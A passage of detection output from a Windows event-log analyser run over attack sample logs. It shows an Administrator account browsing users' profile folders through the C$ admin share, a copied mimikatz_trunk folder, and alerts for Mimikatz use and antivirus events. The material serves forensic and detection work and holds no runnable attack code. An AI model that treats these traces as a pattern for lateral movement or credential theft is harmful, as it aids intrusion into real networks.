+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 